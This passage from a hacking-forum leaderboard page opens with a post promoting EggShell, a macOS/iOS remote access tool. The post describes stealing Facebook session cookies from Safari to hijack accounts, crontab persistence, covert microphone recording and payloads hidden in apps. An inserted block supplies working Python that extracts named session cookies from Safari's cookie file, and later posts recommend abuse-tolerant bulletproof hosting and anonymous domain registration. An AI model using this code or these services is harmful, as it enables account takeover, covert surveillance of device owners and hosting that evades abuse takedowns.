With the command getfacebook, there is a special function in EggShell that parses through Safari's binary cookies. Because Safari's binary cookies are unencrypted, we can easily leak the Facebook c_user and xs cookies and use them to log in from another browser.

macOS Persistence
To achieve persistence, even without being root, the command "persistence" adds the payload to the crontab file. It attempts to reconnect every 60 seconds, even after a reboot. To remove persistence, simply enter "rmpersistence" and it should remove itself from the crontab.

Recording Audio
Using the "mic record" command, we can asynchronously record audio on both iOS and macOS. This means we can record through the mic while running other commands. When we are finished recording, simply run "mic stop"; this will stop the audio recording and download the audio data.

Handling Multiple Sessions
With the built-in "MultiServer" feature, we can listen for multiple connections. Below is an example with 2 connections from the same device; however, this can be done with multiple devices. As we connect to targets, we can use "sessions" to list all the active sessions, "interact" to interact with a session, "close" to close session numbers, and "back" to go back to the MultiServer console.

Payloads In Apps
Payloads can easily be added inside apps. Below is an example of using the "system()" function to call our payload, still in just one line! This method can be used on both macOS and jailbroken iOS. Immediately after running the app, our payload is run and, just as expected, we have a connection.

Safari Exploit + EggShell
Soon after iOS security researcher Luca Todesco released his browser-based 9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from Safari. Below is my video demonstration featured on EverythingApplePro. Original Video

Thanks For Viewing
lucasjackson5815@gmail.com
Download: EggShell-master.zip
Source: http://lucasjackson.me/index.php/eggshell/
1 point
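The getfacebook step in the post above works only because Safari's cookie store is a plain, unencrypted binary file. The parser below is an added example written for this page, not EggShell's own code: it walks the documented Cookies.binarycookies layout ("cook" magic plus big-endian page count and page sizes; pages with a little-endian cookie count, cookie offsets and fixed-layout cookie records whose string offsets are relative to the record; timestamps as doubles counted from the Mac epoch, 2001-01-01) and pulls out cookies by domain and name. The sample store, the .facebook.com filter and every cookie value are constructed here for the demonstration; nothing is read from a real profile, and the classic path ~/Library/Cookies/Cookies.binarycookies is mentioned as an assumption about older macOS releases rather than something the post states.

```python
"""Read Safari's Cookies.binarycookies and pull named cookies out of it.

Added example for this post, not EggShell's own getfacebook code. It follows
the documented on-disk layout: "cook" magic and big-endian page count and page
sizes, then pages with a little-endian cookie count, cookie offsets and
fixed-layout cookie records whose string offsets are relative to the record.
Timestamps are doubles counted from the Mac epoch (2001-01-01).
"""
import struct
from dataclasses import dataclass
from typing import Dict, Iterable, List

MAC_EPOCH = 978307200          # seconds from 1970-01-01 to 2001-01-01
PAGE_HEADER = b"\x00\x00\x01\x00"
FLAG_SECURE, FLAG_HTTPONLY = 1, 4


@dataclass
class Cookie:
    domain: str
    name: str
    path: str
    value: str
    expires: float   # Unix time
    created: float   # Unix time
    secure: bool
    httponly: bool


def _cstring(buf: bytes, off: int) -> str:
    return buf[off:buf.index(b"\x00", off)].decode("utf-8")


def parse_binarycookies(data: bytes) -> List[Cookie]:
    if data[:4] != b"cook":
        raise ValueError("not a Cookies.binarycookies file")
    (num_pages,) = struct.unpack(">I", data[4:8])
    sizes = struct.unpack(f">{num_pages}I", data[8:8 + 4 * num_pages])
    pos = 8 + 4 * num_pages
    cookies: List[Cookie] = []
    for size in sizes:
        page, pos = data[pos:pos + size], pos + size
        if page[:4] != PAGE_HEADER:
            raise ValueError("bad page header")
        (count,) = struct.unpack("<I", page[4:8])
        for off in struct.unpack(f"<{count}I", page[8:8 + 4 * count]):
            # record: size, unknown, flags, unknown, four string offsets,
            # 8 zero bytes, expiry double, creation double, NUL-terminated strings
            (rec_size, _, flags, _, dom, name, path, val) = struct.unpack("<8I", page[off:off + 32])
            rec = page[off:off + rec_size]
            expires, created = struct.unpack("<dd", rec[40:56])
            cookies.append(Cookie(
                _cstring(rec, dom), _cstring(rec, name), _cstring(rec, path), _cstring(rec, val),
                expires + MAC_EPOCH, created + MAC_EPOCH,
                bool(flags & FLAG_SECURE), bool(flags & FLAG_HTTPONLY)))
    return cookies


def session_cookies(data: bytes, domain_suffix: str, names: Iterable[str]) -> Dict[str, str]:
    """Return {name: value} for the wanted cookies of one domain (what a getfacebook-style grab needs)."""
    wanted = set(names)
    return {c.name: c.value for c in parse_binarycookies(data)
            if c.domain.endswith(domain_suffix) and c.name in wanted}


def build_binarycookies(records) -> bytes:
    """Encode (domain, name, path, value, expires, created, flags) tuples as one
    page in the same layout, so the parser can be exercised on a constructed file."""
    def record(domain, name, path, value, expires, created, flags):
        strings, offs = b"", []
        for s in (domain, name, path, value):
            offs.append(56 + len(strings))       # strings start right after the 56-byte fixed part
            strings += s.encode("utf-8") + b"\x00"
        head = struct.pack("<8I", 56 + len(strings), 0, flags, 0, *offs) + b"\x00" * 8
        head += struct.pack("<dd", expires - MAC_EPOCH, created - MAC_EPOCH)
        return head + strings

    recs = [record(*r) for r in records]
    offs, cur = [], 8 + 4 * len(recs) + 4        # page header, count, offsets, footer
    for r in recs:
        offs.append(cur)
        cur += len(r)
    page = (PAGE_HEADER + struct.pack("<I", len(recs))
            + struct.pack(f"<{len(recs)}I", *offs) + b"\x00" * 4 + b"".join(recs))
    return b"cook" + struct.pack(">II", 1, len(page)) + page + b"\x00" * 8  # trailer is ignored by the parser


# Constructed sample store; the values are placeholders, not real session data.
SAMPLE_FILE = build_binarycookies([
    (".facebook.com", "c_user", "/", "100000000000001", 1600000000.0, 1500000000.0, FLAG_SECURE),
    (".facebook.com", "xs", "/", "CONSTRUCTED-XS-TOKEN", 1600000000.0, 1500000000.0, FLAG_SECURE | FLAG_HTTPONLY),
    (".example.com", "sid", "/app", "unrelated", 1600000000.0, 1500000000.0, FLAG_HTTPONLY),
])

if __name__ == "__main__":
    for c in parse_binarycookies(SAMPLE_FILE):
        print(c)
    print(session_cookies(SAMPLE_FILE, ".facebook.com", ("c_user", "xs")))
```

Note that the secure and HttpOnly bits are stored with each record but do nothing for the on-disk copy; they only govern what the browser sends and what page script can see. What stands between a local process and this file is the account's file permissions and, on newer macOS releases, the access controls around Safari's data container, which is why this reads as a local-access problem rather than a Safari bug.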
-
Magnificent app which corrects your previous console command: https://github.com/nvbn/thefuck
1 point
-
It depends on what you want to do. There are also dedicated servers and VPSes in Iran paid in bitcoin, with traffic routed through Russia, and their T&Cs only forbid DDoS, malware, spam and child porn.
1 point
-
Anonymous domain registration: https://njal.la/ for domains; others: http://www.gandi.net http://nic.ru http://prq.se
Hosting: https://masterhost.ru/ http://abusehosting.net/ http://www.2x4.ru/index.php https://www.shinjiru.com/ https://sweb.ru/ http://zservers.ru/ https://jino.ru/
I recommend sollhost: Sales Jabber: webhost@jabberim.org hostmgr@pubchat.im Jabber: sollhost@jabbix.ru
An interesting read: https://www.informatics.indiana.edu/xw7/papers/alrwais2017under.pdf
1 point
-
Hello, if you are interested in networking I invite you to follow these tutorials and apply the concepts through the included labs: [1] https://www.youtube.com/channel/UCVJZsdei_i2G3ZimBzqcmeg [2] https://ramonnastase.ro Good luck!
1 point
This leaderboard is set to Bucharest/GMT+02:00